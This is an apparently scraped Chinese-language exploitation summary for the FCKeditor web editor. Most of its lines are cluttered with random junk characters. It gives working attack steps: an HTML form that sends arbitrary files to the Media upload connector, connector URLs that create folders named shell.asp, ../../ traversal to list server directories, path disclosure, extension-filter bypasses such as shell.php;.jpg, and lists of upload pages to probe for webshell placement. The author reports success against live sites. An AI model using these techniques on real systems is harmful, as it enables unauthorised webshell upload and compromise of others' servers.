Fckeditor漏洞利用总结
s* B6 V1 D5 Y- s0 d* t' C查看编辑器版本. d1 j" j. s0 w, I6 @4 S* X+ U
FCKeditor/_whatsnew.html
4 X" C/ g0 l2 N* R# ^& M/ y3 m: a—————————————————————————————————————————————————————————————# x+ j w& R! _& a; {- ^- k X5 v
4 H$ n3 \ K( [. \2 R' S8 \
2. Version 2.2 版本
- M" a7 R' H2 V7 u* j) s3 y. qApache+linux 环境下在上传文件后面加个.突破!测试通过。
; R: `: M6 k% m6 i6 {1 G7 Q—————————————————————————————————————————————————————————————
$ M! ^ Q# q9 J, V3 e A
: F& o" T% P8 K) N1 K' Y3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
; \+ \6 i/ w3 H$ @<form id="frmUpload" enctype="multipart/form-data": i+ U: S/ K- l; T" T
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>4 B1 `/ O+ `. k1 Q& @
<input type="file" name="NewFile" size="50"><br>
+ ]2 v' `: w& |( `% g0 R5 b<input id="btnUpload" type="submit" value="Upload">4 i) Q" t. x# [6 T) h8 Z( f
</form>
) O3 {1 k+ x6 F) n7 z—————————————————————————————————————————————————————————————" Q2 _8 F P8 C. h H0 O7 [& H, P p
) t R/ y7 v9 n- X4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
t: e s8 \4 B* W. ` 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
* m- z3 A0 v S0 `5 p8 { 4.1:提交shell.php+空格绕过
6 }! ?% {% C5 }不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。& n) j b) c" M% j2 _
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
R/ Q* A( z# O—————————————————————————————————————————————————————————————
, ]# [. h1 r e1 Q7 |8 T- ?8 p
' ^, l( Q$ v- V K5 a. i5. 突破建立文件夹8 X: | ~5 [/ h7 G( V! E
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
6 _( s4 v3 ?. T2 D6 w( W% sFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
& F. {9 w0 }9 p0 b# f. N( `—————————————————————————————————————————————————————————————; l: H) l- U( f: a- g# c$ v1 {+ }
1 V7 D, E* ^, U1 ?, c3 w6. FCKeditor 中test 文件的上传地址+ u7 {- \- U& Y. r1 Q
FCKeditor/editor/filemanager/browser/default/connectors/test.html
- p7 H" X+ v! J0 `% @4 t; ?8 m6 VFCKeditor/editor/filemanager/upload/test.html V( X: f+ }2 D: z
FCKeditor/editor/filemanager/connectors/test.html; F8 @4 d9 R7 V, F
FCKeditor/editor/filemanager/connectors/uploadtest.html7 e s+ ` l* _/ }2 ^: {
—————————————————————————————————————————————————————————————: ]4 a s, c) V) }) v/ @# a
, G; |# `& s+ i- l3 K: Z' t, p7.常用上传地址
" O. d2 l: j/ r9 AFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/; |+ ~. Q. e* v% D6 ^
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
9 r( D5 M5 G0 w% g$ \FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
, I+ G" y" W! d4 ~$ |' mJSP 版:, c) V/ Q4 d% f8 T( D
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
) b6 Z4 Z- n. R! ?5 ^# m注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
# g+ ~4 o9 ]" T! [, s# ?: k件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
" E9 H. _. p5 G+ ^5 W8 H—————————————————————————————————————————————————————————————& @6 n* m; j# i+ _* P
1 Q; z8 f' t! [5 g, b
8.其他上传地址/ q. G+ e) e/ r( o
FCKeditor/_samples/default.html, y: Q' Q u2 o% {
FCKeditor/_samples/asp/sample01.asp2 c: J2 Y$ n) _' U! j4 t. R
FCKeditor/_samples/asp/sample02.asp/ z1 X5 D& L/ R6 x1 j4 T/ b
FCKeditor/_samples/asp/sample03.asp
5 M b! H& y0 r- E: mFCKeditor/_samples/asp/sample04.asp' S/ x& u3 D' Y- R6 M
一般很多站点都已删除_samples 目录,可以试试。" U2 s. A4 N# ~. w- C
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。) F7 |) z" K' R) k
—————————————————————————————————————————————————————————————$ }7 P& c1 o+ _; X( F( Q! ]
1 G( c& B- }4 B1 D7 E, r' ~9.列目录漏洞也可助找上传地址
- B3 w. B5 y& Y7 yVersion 2.4.1 测试通过
( t+ V4 @1 ^: X- J3 b. Z/ u修改CurrentFolder 参数使用 ../../来进入不同的目录* ]" \) Q3 z. f+ Q4 b1 \. d; V3 m, G
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
, ]' D7 N# u6 o$ }! O' k& \# v0 J8 d根据返回的XML 信息可以查看网站所有的目录。
* ^9 W* A: i G% g ^FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F" o1 h/ ]# T4 c& p# {0 u* J% Q# D
也可以直接浏览盘符:+ r- [. F/ O( J( V9 q9 x
JSP 版本:
7 A4 F4 k" E2 y: OFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F) l: \" S) E* K6 h; l( Y% t Q4 t) t
—————————————————————————————————————————————————————————————% U: f" Y1 a3 ]8 Y
$ {( p- P% ~, P5 V$ V
10.爆路径漏洞
( {- t* G! m9 ^0 G1 s' T" C# [2 `FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp2 j8 \7 `+ _( v7 S& V2 z/ k( `4 r% d
—————————————————————————————————————————————————————————————1 S) u8 t' b* a- f2 Q& L, V$ }. A
' D' w2 s) f2 Q" Z
11. FCKeditor 被动限制策略所导致的过滤不严问题
8 a0 y8 s( k0 m. F+ b8 }" M0 T. | 影响版本: FCKeditor x.x <= FCKeditor v2.4.3; n1 \' R1 i! d5 X
脆弱描述:; j8 u# ~2 X1 d# L$ d' O: m) d
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
2 t. K/ ?' w; D% W& K. R" ^4 R* phtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
0 M+ o H3 |1 B$ s+ k" t1 jFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
K" t% @ n2 x& v2 T8 r d1 f 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
# B# e* P6 ]9 c 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!" v, f* a5 e2 D
—————————————————————————————————————————————————————————————$ ]% \- | I9 u* I' p2 t
0 R& }0 G4 ~+ b
12.最古老的漏洞,Type文件没有限制!6 K( T% U4 U* K4 y
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
! f8 U" `- E& D—————————————————————————————————————————————————————————————% k% }$ }6 n) a4 I6 H3 u
+ q8 ~3 A. c% s+ r ^===============================================================================================================================================+ X' V2 u7 i* t$ W
6 o2 `/ |7 s5 [* m/ e/ N
FCK编辑器jsp版本漏洞:& [( X0 ~* Z4 g( n g
* b Y2 w( [( V9 H7 q5 A6 J
T1 D' Z, p* L2 Khttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
5 F/ B" B Q3 n: n4 E- \9 P7 | S4 {) C9 |2 i& t& u' L
上传马所在目录' c5 g% J5 T( d3 O* t& t4 o
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
% D+ b" I2 a8 W5 y3 |! h上传shell的地址:% J. @) Z# K, n( R
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
2 y) ^1 T" J/ `% C- M/ m: I. ?跟版本有关系.并不是百分百成功. 测试成功几个站.5 w3 b! G/ b# ]# j& w2 C
不能通杀.很遗憾.: t& T6 }% i7 B' U2 S
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector8 u0 r! b! K# p( l! c- E
如果以上地址不行可以试试& C7 c8 O! r) I9 ? |2 s
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector* Z8 \& k. U0 `9 Y* p* e5 V
FCKeditor/_samples/2 r" q Q. [- B5 Q, D. @& F
FCKeditor/_samples/default.html' X+ n; D& \3 {& j4 B6 _
FCKeditor/editor/fckeditor.htm& H4 d O& _0 |, ~+ t# F
FCKeditor/editor/fckdialog.html& G: Q% `' |* a! l w% H! g6 W4 w4 M
9 |6 T) F9 A5 L; P
$ A: q) f3 T6 Q6 G$ d1 t! y( N
0 W, `- o/ O: C% L; @解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
o$ S% j% J" b @* e0 F4 n- W4 u |